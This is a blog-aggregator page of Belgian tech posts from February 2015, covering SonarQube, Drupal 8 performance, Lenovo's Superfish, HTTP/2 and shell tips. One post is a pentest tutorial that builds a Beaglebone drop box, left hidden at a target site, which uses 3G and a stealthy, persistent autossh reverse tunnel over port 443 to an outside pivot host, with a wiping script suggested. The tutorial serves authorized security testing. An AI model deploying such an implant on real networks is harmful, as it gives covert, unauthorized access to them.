Les Jeudis du Libre

Mons, March 19 – SonarQube: another view of your software

SonarQube logo
This Thursday, March 19, 2015, at 7 p.m., the 37th Mons session of the Jeudis du Libre of Belgium will take place.

The topic of this session: SonarQube: another view of your software

Theme: Quality|Development|Tools|Visualization

Audience: everyone

Speaker: Dimitri Durieux (CETIC)

Venue: the technical campus (ISIMs) of the Haute Ecole en Hainaut, Avenue V. Maistriau, 8a, Salle Académique, 2nd building (see this map on the ISIMs website, and here on the Openstreetmap map).

Attendance is free and only requires registration by name, preferably in advance, or at the door. Please indicate your intention by registering via http://jeudisdulibre.fikket.com/. The session will be followed by a friendly drink.

The Jeudis du Libre in Mons also enjoy the support of our partners: CETIC, Normation, OpenSides, MeaWeb, NextLab, Phonoid and Creative Monkeys.

If you are interested in this monthly series, feel free to consult the agenda and to subscribe to the mailing list so you automatically receive the announcements.

As a reminder, the Jeudis du Libre are meant to be spaces for exchange around Free Software themes. The Mons meetings take place every third Thursday of the month and are organized on the premises of, and in collaboration with, Mons universities and colleges involved in training computer scientists (UMONS, HEH and Condorcet), with the support of the non-profit LoLiGrUB, which is active in promoting free software.

Description: the quality of a piece of software is a divisive subject: some consider it an extra cost and see it as a constraint, while others consider it an opportunity and see quality as a working guide. Quality in general means putting in place the conditions (organization, tools, rules, team) that make it possible to meet the expressed needs. In the case of software development, that means implementing the customer's functional and non-functional needs. We therefore distinguish functional quality (meeting the functional needs) from non-functional quality (meeting the non-functional needs). Against the extra cost induced by quality, one should thus weigh the cost induced by a lack of software quality. This lack of software quality is called technical debt.

SonarQube (formerly Sonar) is an open-source project for tracking the quality of software development. SonarQube is thus an open-source project for open source: open-source ecosystems such as OW2 and Polarsys (Eclipse) use it to evaluate the maturity of their projects. Unlike classic analyzers (for example PMD or Checkstyle), SonarQube positions itself as a dashboard that integrates other analyzers and helps interpret their results.

SonarQube offers a set of views over a portfolio of applications in order to manage the evolution of their technical debt. To feed those views, it relies on a plugin-oriented architecture that allows it to support more than twenty languages, from COBOL to Java, by way of C# and PHP. The plugin development API is open source, so it is possible to add custom plugins to support new languages, provide new views, or interface with existing tools.

by Didier Villers at February 24, 2015 08:16 AM

February 23, 2015

Frank Goossens

User Agent Madness

Just found this one in my http logfile;

Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

So that's one User Agent string mentioning 4 browsers (Mozilla, Safari, Chrome and finally Opera 27, which is the actual browser) and 3 rendering engines (AppleWebKit, KHTML and Gecko). There is a lot of web history in those 127 characters.

by frank at February 23, 2015 06:27 AM

February 22, 2015

Dieter Adriaenssens

Buildtime Trend v0.2 released!

Visualise what's trending in your build process

Buildtime Trend Logo
What started as a few scripts to gain some insight into the duration of the stages in a build process has evolved into Buildtime Trend, a project that generates and gathers timing data of build processes. The aggregated data is used to create charts that visualise trends in a build process.

The major new features are support for parsing Travis CI build logs to retrieve timing data, and the introduction of the project as a service that gathers Travis CI generated timing data, hosts a dashboard with different charts and offers shield badges with different metrics.

Try it out!

The hosted service supports Open Source projects (public on GitHub) running their builds on Travis CI. Thanks to the kind people of Keen.io, who host the aggregated data, the hosted service is currently available for free to Open Source projects.
Get started! It's easy to set up in a few steps.

A bit more about Buildtime Trend

Dashboard example
Buildtime Trend is an Open Source project that generates and gathers timing data of build processes. The aggregated data is used to create charts that visualise trends in the build process.
These trends can help you gain insight into your build process: which stages take the most time? Which stages are stable, and which have a fluctuating duration? Is there a decrease or increase in average build duration over time?
With these insights you can improve the stability of your build process and make it more efficient.

Timing data is generated either with a client or by using Buildtime Trend as a Service.
The Python-based client generates custom timing tags for any shell-based build process and can easily be integrated. A script processes the generated timing tags when the build is finished and stores the results.
Buildtime Trend as a Service obtains timing and build-related data by parsing the log files of a build process. Currently, Travis CI is supported: simply trigger the service at the end of a Travis CI build and the parsing, aggregating and storing of the data happens automatically.

The aggregated build data is used to generate a dashboard with charts powered by the Keen.io API and data store.

Check out the website for more information about the project, follow us on Twitter, or subscribe to the community mailing list.

by Dieter Adriaenssens (noreply@blogger.com) at February 22, 2015 08:35 PM

February 20, 2015

Frank Goossens

Music from Our Tube; Ala.ni

Ala.ni appears to be

a London-based singer/songwriter, producer & video director who already worked with such artists as Mary J Blige, Damon Albarn and Andrea Bocelli

While that may sound a lot like the typical name-dropping in a press release for the next would-be star, her music has a distinct jazzy, forties-yet-modern feel to it and above all it’s really beautiful;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Ala.ni will issue an EP in March and the first song from that, Cherry Blossom, is well worth a listen too!

by frank at February 20, 2015 04:03 PM

Wouter Verhelst

LOADays 2015

Looks like I'll be speaking at LOADays again. This time around, at the suggestion of one of the organisers, I'll be speaking about the Belgian electronic ID card, for which I'm currently employed as a contractor to help maintain the end-user software. While this hasn't been officially confirmed yet, I've been hearing some positive signals from some of the organisers.

So, under the assumption that my talk will be accepted, I've started working on my slides. The intent is to explain how the eID middleware works (in general terms), how the Linux support is supposed to work, and what to do when things fail.

If my talk doesn't get rejected at the final hour, I will continue my uninterrupted "speaker at LOADays" streak, which goes back to the conference's first edition...

February 20, 2015 10:47 AM

February 19, 2015

Dries Buytaert

Making Drupal 8 fly

In my travels to talk about Drupal, everyone asks me about Drupal 8's performance and scalability. Modern websites are much more dynamic and interactive than they were 10 years ago, which makes it harder to build sites that are both modern and fast. It made me realize that maybe I should write up a summary of some of the most exciting performance and scalability improvements in Drupal 8. After all, Drupal 8 will leapfrog many of its competitors in terms of how to architect and scale modern web applications. Many of these improvements benefit both small and large websites, but they also allow us to build even bigger websites with Drupal.

More precise cache invalidation

One of the strategies we employ in making Drupal fast is "caching". This means we try to generate pages or page elements one time and then store them so future requests for those pages or page elements can be served faster. If an item is already cached, we can simply grab it without going through the building process again (known as a "cache hit"). Drupal stores each cache item in a "cache bin" (a database table, Memcache object, or whatever else is appropriate for the cache backend in use).

In Drupal 7 and before, when one of these cache items changes and needs to be re-generated and re-stored (the cache gets "invalidated"), you can only delete a specific cache item, clear an entire cache bin, or use prefix-based invalidation. None of these three methods lets you invalidate all cache items that contain data of, say, user 200. The only method that is guaranteed to suffice is clearing the entire cache bin, and this means we usually invalidate way too much, resulting in poor cache hit ratios and wasted effort rebuilding cache items that haven't actually changed.

This problem is solved in Drupal 8 thanks to the concept of "cache tags": each cache item can have any number of cache tags. A cache tag is a compact string that describes the object being cached. Thanks to this extra metadata, we can now delete all cache items that use the user:200 cache tag, for example. This means we've deleted all the cache items we must delete, but not a single one more: optimal cache invalidation!
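
A minimal sketch of the idea, assuming a loaded $user entity (my illustration, using the render-array '#cache' keys and the cache tag invalidation API described above):

<?php
use Drupal\Core\Cache\Cache;

// Anything rendered from this array is cached with the 'user:200' tag.
$build = [
  '#markup' => $user->getDisplayName(),
  '#cache' => [
    'tags' => ['user:200'],
  ],
];

// When user 200 changes, invalidate every cache item carrying this
// tag -- and nothing else.
Cache::invalidateTags(['user:200']);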

Drupal cache tags

Example cache tags for different cache IDs.

And don't worry, we also made sure to expose the cache tags to reverse proxies, so that efficient and accurate invalidation can happen throughout a site's entire delivery architecture.

More precise cache variation

While accurate cache invalidation makes caching more efficient, there is more we did to improve Drupal's caching. We also make sure that cached items are optimally varied. If you vary too much, duplicate cache entries will exist with the exact same content, resulting in inefficient usage of caches (low cache hit ratios). For example, we don't want a piece of content to be cached per user if it is the same for many users. If you vary too little, users might see incorrect content as two different cache entries might collide. In other words, you don't want to vary too much nor too little.

In Drupal 7 and before, it's easy to program any cached item to vary by user, by user role, and/or by page, and could even be configured through the UI for blocks. However, more targeted variations (such as by language, by country, or by content access permissions) were more difficult to program and not typically exposed in a configuration UI.

In Drupal 8, we introduced a Cache Context API to allow developers and site builders to express these variations and to make them automatically available in the configuration UI.
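
As a small illustrative sketch (mine, not from the post) of what such a declaration looks like in a render array -- vary by interface language and by role instead of by individual user:

<?php
// One cached copy per interface language and per combination of roles,
// rather than one copy per user.
$build = [
  '#markup' => t('Role- and language-dependent content'),
  '#cache' => [
    'contexts' => ['languages:language_interface', 'user.roles'],
  ],
];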

Drupal cache contexts

Server-side dynamic content substitution

Usually a page can be cached almost entirely except for a few dynamic elements. Often a page served to two different authenticated users looks identical except for a small "Welcome $name!" and perhaps their profile picture. In Drupal 7, this small personalization breaks the cacheability of the entire page (or rather, requires a cache context that's way too granular). Most parts of the page, like the header, the footer and certain blocks in the sidebars don't change often nor vary for each user, so why should you regenerate all those parts at every request?

In Drupal 8, thanks to the addition of #post_render_cache, that is no longer the case. Drupal 8 can render the entire page with some placeholder HTML for the name and profile picture. That page can then be cached. When Drupal has to serve that page to an authenticated user, it will retrieve it from the cache, and just before sending the HTML response to the client, it will substitute the placeholders with the dynamically rendered bits. This means we can avoid having to render the page over and over again, which is the expensive part, and only render those bits that need to be generated dynamically!

Client-side dynamic content substitution

Some things that Drupal has been rendering for the better part of a decade, such as the "new" and "updated" markers on comments, have always been rendered on the server. That is not ideal because these markers are different for every visitor and as a result, it makes caching pages with comments difficult.

The just-in-time substitution of placeholders with dynamic elements that #post_render_cache provides us can help address this. In some cases, as with the comment markers, we can do even better and offload more work from the server to the client. In the case of comment markers, a certain comment is posted at a certain time — that doesn't vary per user. By embedding the comment timestamps as metadata in the DOM with a data-comment-timestamp="1424286665" attribute, we enable client-side JavaScript to render the comment markers: it fetches (and caches on the client side) the "last read" timestamp for the current user and simply compares the numbers. Drupal 8 provides some framework code and an API to make this easy.

A "Facebook BigPipe" render pipeline

With Drupal 8, we're very close to taking the client-side dynamic content substitution a step further, just like some of the world's largest dynamic websites do. Facebook has 1.35 billion monthly active users all requesting dynamic content, so why not learn from them?

The traditional page serving model has not kept up with the rise of highly personalized websites where different content is served to different users. In the traditional model, such as Drupal 7, the entire page is generated before it is sent to the browser: while Drupal is generating a page, the browser is idle and wasting its cycles doing nothing. When Drupal finishes generating the page and sends it to the browser, the browser kicks into action, and the web server is idle. In the case of Facebook, they use BigPipe. BigPipe delivers pages asynchronously instead; it parallelizes browser rendering and server processing. Instead of waiting for the entire page to be generated, BigPipe immediately sends a page skeleton to the client so it can start rendering that. Then the remaining content elements are requested and injected into their correct place. From the user's perspective the page is rendered progressively. The initial page content becomes visible much earlier, which improves the perceived speed of the site.

We've made significant improvements to the way Drupal 8 renders pages (presentation). By default, Drupal 8 core still implements the traditional model of assembling these pieces into a complete page in a single server-side request, but the independence of each piece and the architecture of the new rendering pipeline enable different “render strategies" to be experimented with — different methods for dynamic content assembly, such as BigPipe, Edge Side Includes, or other ideas for making the most optimal use of client, server, content delivery networks and reverse proxies. In all those examples, the idea is that we can send the primary content first so the client can start rendering that. Then we send the remaining Drupal blocks, such as the navigation menu or a 'Related articles' block, and have the browser, content delivery network or reverse proxy assemble or combine these blocks into a page.

Drupal render pipeline

A snapshot of the Drupal 8 render pipeline diagram that highlights where alternative render strategies can be implemented.

Some early experiments by Wim Leers in Acquia's OCTO show that we can improve performance by a factor of about 2 compared to a recent Drupal 8 development snapshot. These breakthroughs are enabled by leveraging the various improvements we made to Drupal 8.

And much more

But that is not all. The Drupal community has actually done much more, including: complete asset dependency information (which allowed us to ensure zero JavaScript is loaded by default for anonymous users and to send less data on AJAX requests), pluggable CSS/JS aggregation and minification (to support better optimization algorithms), and more. We've also made sure Drupal 8 is fast by default, by having better defaults: CSS/JS aggregation enabled, JS assets loaded from the bottom, block caching enabled, and so on.

All in all, there is a lot to look forward to in Drupal 8!

Special thanks to Acquia's Wim Leers, Alex Bronstein and Angie Byron for their contributions to this blog post.

by Dries at February 19, 2015 07:57 PM

Mattias Geniar

Tearing Down Lenovo’s Superfish Statement

The post Tearing Down Lenovo’s Superfish Statement appeared first on ma.ttias.be.

The last 48 hours have been interesting, given Lenovo has been caught installing Man-in-the-Middle root certificates on newly purchased laptops via spyware known as Superfish.

It's even more interesting now that the private key to that root certificate has been compromised. The password "komodia" tracks back to a known/commercial SSL hijacker.
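If you want to poke at the leaked certificate yourself, here is a quick sketch (assuming you saved the extracted PEM files locally; the filenames are made up):

# Who issued what, and for how long:
openssl x509 -in superfish.pem -noout -subject -issuer -dates
# Verify that the leaked private key really matches the certificate,
# by comparing the public key digests:
openssl x509 -in superfish.pem -noout -pubkey | openssl md5
openssl rsa -in superfish.key -pubout | openssl md5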

It's a sign of the bad state IT security is in nowadays. Network switches and routers are intercepted on their way to ISPs to install backdoors, hard disk drives have NSA spyware in their firmware from the factories and now consumer laptops have spyware and man-in-the-middle certificates on them.

If we can't even trust the hardware we use, how are we ever going to be able to trust the software?

But what disturbs me most in this Lenovo scandal is their latest news announcement on Superfish.

Superfish was previously included on some consumer notebook products shipped in a short window between September and December ...

This short window means the entire Q4 of 2014. So let's take the numbers published for Q4 2013 from Lenovo. The numbers may be a year old, but Lenovo isn't selling any less. So if Q4 2013 resulted in "$4.8 billion in sales (accounting for 51 percent of the Company’s overall sales)", how many laptops do you think those are?

An average selling price of $750 (just a wild guess, it's probably less) would result in 6,400,000 laptops sold.

Diminishing the Superfish impact by saying "included on some consumer notebooks" is a smack in the face.

Superfish has completely disabled server side interactions (since January) on all Lenovo products so that the product is no longer active. This disables Superfish for all products in market.

Oh good. The threat is over.

Except it isn't. The CA certificate is still present on those laptops. The spyware itself is still installed on those machines. Guess what Lenovo, if you can disable it server-side, it can be enabled again server-side as well. You've temporarily disabled part of the problem while ignoring the bigger picture and providing a false sense of security.

Users are given a choice whether or not to use the product.

How is that even remotely true, if it's pre-installed on laptops without asking the user first?

The relationship with Superfish is not financially significant; our goal was to enhance the experience for users. We recognize that the software did not meet that goal and have acted quickly and decisively.

The primary goal of Superfish was to show ads and inject them into various places. This is most likely the true reason for inserting their own CA certificate: to keep injecting ads on SSL/TLS-enabled sites.

If the primary goal of an application is to show ads, it's a financial choice. While it may not be financially significant to Lenovo, the choice to embed Superfish was made based on dollars. How much could this make us each month? What would Superfish pay Lenovo? How much money can they gain from this deal?

The only reason the relationship with Superfish existed in the first place, was a financial reason. Nothing else, Lenovo.

In this case, we have responded quickly to negative feedback, and taken decisive actions to ensure that we address these concerns.

This is where Lenovo missed the point entirely. There should never have been anything to react to in the first place. They're selling laptops to consumers. That gives them 2 distinct priorities: the laptops should A) work and B) not contain any spyware. I'd love to see B) take priority over A), but for Lenovo A) will come first.

How did Superfish make it through internal reviews at Lenovo? How can any technical engineer feel OK allowing and approving this to be pre-installed on consumer laptops?

The private key for the Superfish certificate is exposed. Out of those 6,400,000 laptops sold, I'd venture a guess that 6,350,000 owners have no clue this happened and will continue to live their lives with a pre-compromised computer. Just making online payments as if nothing happened.

Good work Lenovo. Way to destroy our faith in IT security just a little more.

The post Tearing Down Lenovo’s Superfish Statement appeared first on ma.ttias.be.

by Mattias Geniar at February 19, 2015 07:10 PM

Xavier Mertens

My Little Pwnie Box

As a pentester, I’m always trying to find new gadgets and tools to improve my toolbox. A few weeks ago, I received my copy of Dr Philip Polstra’s book: “Hacking and Penetration Testing with Low Power Devices” (ISBN: 978-0-12-800751-8). I had a very interesting chat with Phil during the last BruCON edition and I was impressed by his “lunch box“. That’s why I decided to buy his book.

This post is not a review of Phil’s book (here is one). It’s just a wrap-up about my own “little pwnie” box setup. The book is based on the Beaglebone hardware. It’s a credit-card-sized computer that can run Linux (amongst other operating systems) and has plenty of I/O. Much more powerful than the classic Raspberry Pi, its size and the fact that it can easily be powered via USB, batteries or a regular power adapter (the book has a chapter dedicated to powering the Beaglebone) make it a very nice choice for building a pentesting device. The primary goal of such a small computer is to be dropped discreetly somewhere to open a door onto your target’s network. While a Beaglebone has enough power to perform basic tasks during a pentest engagement, don’t expect to run a distribution like Kali on such hardware! That’s why Phil maintains his own distribution dedicated to the Beaglebone platform: The Deck. As described on the website, add-ons are available to extend its capabilities, like 802.15.4 networking or drones for aerial operations (AirDeck), similar to my Aircrack-One project.

I did not use Phil’s distribution because I like to build things by myself and to understand how they work. I set up my own Beaglebone from scratch. The base OS is an Ubuntu 14.04-LTS compiled for the ARM processor. The procedure is available on ARMhf.com. Then I installed my favourite tools (Nmap, Aircrack-ng, Truecrypt and so on).

As Phil explains in the book, some tools are available as standard packages and a simple “apt-get install xxx” will do the job. Others must be compiled. My recommendation is to fetch the source code from github.com (or any other repository service) and compile it on the Beaglebone. Even if a tool is available as a package, there are always differences. Nmap is a good example: many more NSE scripts are available in the repository. Why Truecrypt? Because the Beaglebone will be dropped in a hostile environment. It’s a good idea to store all your collected data and evidence in an encrypted container.

Aircrack-ng works perfectly with my AWUS036NH wireless card (a good old standard card for pentesters) but my primary goal is not to use my Beaglebone for wireless pentests; I’m the happy owner of a Pineapple for that purpose! My goal is to build a box that can be dropped somewhere, connected to a network, and will phone home. This is not covered in Phil’s book, so here is my contribution.

I’ve a Huawei 3G USB stick with a data-only card. This HSDPA modem is recognised out-of-the-box by most Linux distribution. It’s the same for the Beaglebone:

[ 16.364815] usb 2-1: new high-speed USB device number 3 using musb-hdrc
[ 16.524132] usb 2-1: device v12d1 p1001 is not supported
[ 16.529904] usb 2-1: New USB device found, idVendor=12d1, idProduct=1001
[ 16.529919] usb 2-1: New USB device strings: Mfr=2, Product=1, SerialNumber=0
[ 16.529929] usb 2-1: Product: HUAWEI Mobile
[ 16.529939] usb 2-1: Manufacturer: HUAWEI Technology

To manage dialup connections, Ubuntu has NetworkManager, but I chose not to install a GUI on my Beaglebone. The de-facto tool to manage dialup connections from the command line is wvdial. I remember what a nightmare it was to configure PPP in the ’90s; wvdial takes care of this for you. To test if your modem is compatible, simply run wvdialconf:

root@beagle:/etc# wvdialconf /etc/wvdial.conf
Editing `/etc/wvdial.conf'.

Scanning your serial ports for a modem.

Modem Port Scan<*1>: S0 S1 S2 S3 
ttyUSB0<*1>: ATQ0 V1 E1 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 Z -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB0<*1>: Modem Identifier: ATI -- Manufacturer: huawei
ttyUSB0<*1>: Speed 9600: AT -- OK
ttyUSB0<*1>: Max speed is 9600; that should be safe.
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up.
ttyUSB2<*1>: ATQ0 V1 E1 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 Z -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB2<*1>: Modem Identifier: ATI -- Manufacturer: huawei
ttyUSB2<*1>: Speed 9600: AT -- OK
ttyUSB2<*1>: Max speed is 9600; that should be safe.
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK

Found a modem on /dev/ttyUSB0.
Modem configuration written to /etc/wvdial.conf.
ttyUSB0<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
ttyUSB2<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"

Then edit your configuration to match your mobile operator’s requirements. Mine looks like this:

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"IP","<your_apn>"
Modem Type = Analog Modem
Baud = 115200
New PPPD = yes
Modem = /dev/ttyUSB0
ISDN = 0
Phone = *99#
Password = <your_apn_password>
Username = <your_apn_username>
Check Def Route = yes
Auto Reconnect = yes

The important settings are the APN (Init3) and your operator’s phone number, username and password. The next step is to bring the 3G connection up at boot time. That’s easy with Ubuntu: add the following lines to your /etc/network/interfaces file:

auto ppp0
iface ppp0 inet wvdial
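You can test this without rebooting (assuming ifupdown manages the interface, as configured above):

# Bring the connection up by hand:
ifup ppp0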

At this point, my 3G USB modem connected, but one problem remained: if the Ethernet interface was already up with a default gateway, no new default route was added via the ppp0 interface. To fix this, the following file has to be modified: /etc/ppp/peers/wvdial:

noauth
name wvdial
usepeerdns
defaultroute
replacedefaultroute

Now that the Beaglebone is connected to the world, it is not yet very useful because we don’t know how to reach it. Chances are that, on a 3G/4G network, it received an RFC 1918 IP address and connects to the Internet via NAT. The best way around this is to use SSH to connect out to a host and set up a reverse shell. Another key requirement is persistence (like a real malicious program): we must be sure that the SSH session will remain available at all times. A tool called “autossh” takes care of exactly this. Once the standard package is installed, create a configuration file /etc/init/autossh.conf:

# autossh startup Script

description "AutoSSH Daemon Startup"

start on net-device-up
stop on runlevel [01S6]

respawn
respawn limit 5 60 # respawn max 5 times in 60 seconds

script
export AUTOSSH_PIDFILE=/var/run/autossh.pid
export AUTOSSH_POLL=60
export AUTOSSH_FIRST_POLL=30
export AUTOSSH_GATETIME=0
export AUTOSSH_DEBUG=1
autossh -M 0 -4 -N -R 2222:127.0.0.1:22 -o "ServerAliveInterval 60" -o "ServerAliveCountMax 3" -o BatchMode=yes -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa -p 443 user@pivot-host
end script

What does it do? An SSH session will be opened to the machine “pivot-host” with the login “user“. Authentication is performed with the private key stored in /root/.ssh/id_rsa (don’t forget to copy the public key to ‘pivot-host’). Change the default port (22) to something more stealthy; personally, I like to do SSH over TCP/443, which is often open to the Internet. The reverse shell is created with “-R 2222:127.0.0.1:22“: a connection to port 2222 on pivot-host will be forwarded to port 22 on the Beaglebone’s loopback interface.
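The one-time key setup could look like this (a sketch; it assumes sshd on the pivot host already listens on TCP/443, as described above):

# On the Beaglebone: generate a passphrase-less key pair...
ssh-keygen -t rsa -f /root/.ssh/id_rsa -N ''
# ...and push the public half to the pivot host:
ssh-copy-id -i /root/.ssh/id_rsa.pub -p 443 user@pivot-host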

Connect the 3G USB stick, boot the Beagle and a few seconds later, you’ll get a reverse shell opened on your pivot host. You are ready to connect back to the Beaglebone:

root@pivot:/tmp# netstat -anp|grep 2222
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN 20549/sshd: xavier
tcp6 0 0 :::2222 :::* LISTEN 20549/sshd: xavier
root@pivot:/tmp# ssh -p 2222 user@127.0.0.1
user@127.0.0.1's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.14.4.1-bone-armhf.com armv7l)

* Documentation: https://help.ubuntu.com/
Last login: Wed Feb 18 20:58:43 2015 from mclt0040-eth0.home.rootshell.be
xavier@beagle:~$

Now drop your Beaglebone in a nice place at your target’s location, like a meeting room, behind a computer (and use one of its USB ports to power it), and walk away… Happy hunting! One last tip: when your micro SD card is ready, make a copy of it to easily re-install new Beaglebones. They are cheap and can be left onsite after your engagement; just bill them to your customer. If you leave one onsite, be sure to have a suicide script that wipes the data on the SD card!

by Xavier at February 19, 2015 03:02 PM

February 18, 2015

Frank Goossens

Wanted: testers for WP YouTube Lyte (the one with the new YT API)

As I wrote a couple of weeks ago, YouTube is shutting down their old v2 API, forcing WP YouTube Lyte to switch to v3. The main change: users will have to get an API key from Google and provide it on the Lyte settings page.

Initial development & testing has been done (this blog switched already) and I now need some brave souls to test this. You can download the “beta” from https://downloads.wordpress.org/plugin/wp-youtube-lyte.zip and report back here or on the wordpress.org support forum about how that did or did not work for you.

Looking forward to having to fix some nasty bugs until everything is finally in its right place once again ;-)

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at February 18, 2015 04:25 PM

Mattias Geniar

HTTP/2 Specification Is Final

The post HTTP/2 Specification Is Final appeared first on ma.ttias.be.

February 18th, 2015. A day that, for better or worse, will change the internet.

The IESG has formally approved the HTTP/2 and HPACK specifications, and they’re on their way to the RFC Editor, where they’ll soon be assigned RFC numbers, go through some editorial processes, and be published.
mnot.net

This means HTTP/2 has been finalised and the spec is ready to be implemented.

Here are a few things to read up on, in case you're new to the HTTP/2 protocol.

I for one am happy to see HTTP/2 be finalised. There are some really good parts about the spec. Yes, it's lacking in some areas -- but it's by far an improvement over the HTTP/1.1 spec.

The post HTTP/2 Specification Is Final appeared first on ma.ttias.be.

by Mattias Geniar at February 18, 2015 07:05 AM

February 17, 2015

Claudio Ramirez

Build the Padre development tree using local::lib on Debian/Ubuntu

Thanks to the great job of Kaare Rasmussen (kaare) and Kevin Dawson (bowtie) in moving the Padre repository from a stalled svn/trac setup to github (and keeping the repo alive), development can hopefully be rebooted.

I posted a small howto about setting up a development environment to hack on Padre (svn), but it’s already outdated due to the new libraries that Linux distros now package (gtk3, wx 3.0.1, etc.). The fastest way I found to set up a Padre environment is using local::lib (https://metacpan.org/pod/local::lib).

Because recent Linux distributions have recent Perl and Padre packages, you won’t be working with ancient packages. E.g., Ubuntu 14.10 comes with Perl 5.20.1 and Padre 1.0 (this is also valid for Debian Testing/Unstable). Kudos to the Debian Perl Group (https://pkg-perl.alioth.debian.org/).

These instructions are provided for building a development environment to hack on Padre itself or to keep track of the most recent changes on github.

These are the steps to get Padre from github:

  • Get the OS dependencies. The easiest way is just to install the packaged padre. Its dependencies include local::lib:
    $ sudo apt-get install padre

The OS-packaged Padre can of course be started by just typing:

$ padre

  • Get development dependencies for Padre:
    $ cpanm -l ~/perl5 Module::Install
  • Install Padre and dependencies:
    $ cpanm -l ~/perl5 .
  • Run Padre:
    – in dev mode:
    $ ./dev
    – or the local::lib-installed app:
    $ ~/perl5/bin/padre

Filed under: Uncategorized Tagged: github, local::lib, Padre, Perl

by claudio at February 17, 2015 10:16 PM

Mattias Geniar

Async MySQL Calls in HHVM 3.6

The post Async MySQL Calls in HHVM 3.6 appeared first on ma.ttias.be.

HHVM keeps getting better.

Long-awaited MySQL support for async functions in Hack! Hack’s async functions allow an application to continue executing code while fetching data, which can dramatically reduce the time it spends waiting for IO. We blogged a few weeks ago about async curl support, and with 3.6, MySQL will be usable with Hack’s async functions as well.
HHVM blog

After their async curl support announcement, it's time for a really impressive feature: async MySQL calls. Imagine having the ability to fire off multiple queries to multiple SQL servers in parallel.

While it's not exactly a drop-in replacement for PHP, HHVM can be a real candidate to consider if you're working on large-scale PHP projects.

The post Async MySQL Calls in HHVM 3.6 appeared first on ma.ttias.be.

by Mattias Geniar at February 17, 2015 10:08 PM

Giving HTTPie a Chance

The post Giving HTTPie a Chance appeared first on ma.ttias.be.

Maybe it's time to give ye ol' curl some competition.

Just a normal tweet. A random thought, and you throw it out there into the world. The best part? Reactions!

Let's say Tim is right. I'll give HTTPie a shot.

In any case, the coloured output is a lot easier to digest. Now to get to grips with the syntax and the arguments -- and to unlearn the curl options that have been hardwired into my brain for years.

httpie_vs_curl
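To start retraining those fingers, a few equivalent invocations (the URLs are just examples; note that HTTPie sends key=value pairs as a JSON body by default):

# The request I'd normally type as 'curl -i https://ma.ttias.be/':
http https://ma.ttias.be/
# A JSON POST without any -H or -d juggling:
http POST httpbin.org/post name=mattias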

Good luck HTTPie, you're fighting against years of curl love for me. But I'll give you the chance you deserve.

The post Giving HTTPie a Chance appeared first on ma.ttias.be.

by Mattias Geniar at February 17, 2015 10:00 PM

Sébastien Wains

Migrating from Wordpress to Scriptogr.am

I just migrated this blog from Wordpress to Scriptogr.am.

Mainly because this blog isn't very active anymore; those SQL IOPS were wasted on something that had become so static (I disabled the comments many years ago, tired of spam).

I missed Posterous and started looking for something similar, until I found out about Calepin.co and Scriptogr.am.

For those of you who don't know, Scriptogr.am will fetch markdown text files from your Dropbox and turn them into a website.

What I like about this approach is that all my articles are stored locally (in a readable format) on my computer, and I can grep, sed and awk the hell out of them.

On the Mac, I use Mou and on Android Draft. I still have to find a good editor on Linux.

Draft can connect to your Dropbox and synchronise with any folder, so you can pick your posts folder. Most similar apps don't give you a choice.

Mou has many interesting features and has integrated with Scriptogram, so you can push your articles straight from the editor.

The downside of Scriptogr.am is probably the lack of comments (which I don't care about, and some people came up with the code to have Disqus anyway), the inability to search inside your blog (you have to Google it), and the fact that if you need several blogs on the platform, you need as many Dropbox accounts. I can deal with that: I have a personal and a work Dropbox account, and I use both, for this blog and for my travel blog.

I used exitwp to convert the XML export of Wordpress into markdown.

Now, you might actually start seeing new content all over again, given how easy it is to publish stuff :-)

February 17, 2015 05:00 AM

February 16, 2015

Sébastien Wains

Pipe tcpdump traffic into Wireshark from a remote server

This command will allow you to pipe traffic generated by tcpdump on a remote machine into Wireshark running on your local machine:

ssh root@dest tcpdump -U -s0 -w - 'tcp port 389' | wireshark -k -i -

February 16, 2015 05:00 AM

Bash: loop until a connection is successful

I use Terminator as my terminal app, and use the "watch for activity" feature a lot. With the following command, I'd get notified as soon as the connection is opened.

while ! nc -vz localhost 3306; do sleep 1; done
echo 'Database is available'
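The same pattern works for any TCP service; a variant (hostname made up) that waits for a rebooted machine's sshd to come back:

while ! nc -vz myserver 22; do sleep 1; done
echo 'SSH is back up'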

February 16, 2015 05:00 AM

Android Automagic: enable or disable motion detection on Dlink webcams

This has been tested on DCS-930L and DCS-5020L

<?xml version='1.0' encoding='UTF-8' standalone='yes' ?>
<data version="1.25.0">
  <trigger type="wifi_connected">
    <useDefaultName>true</useDefaultName>
    <name>WiFi Connected: SSID</name>
    <enabled>true</enabled>
    <all>false</all>
    <ssidList>SSID</ssidList>
  </trigger>
  <trigger type="wifi_disconnected">
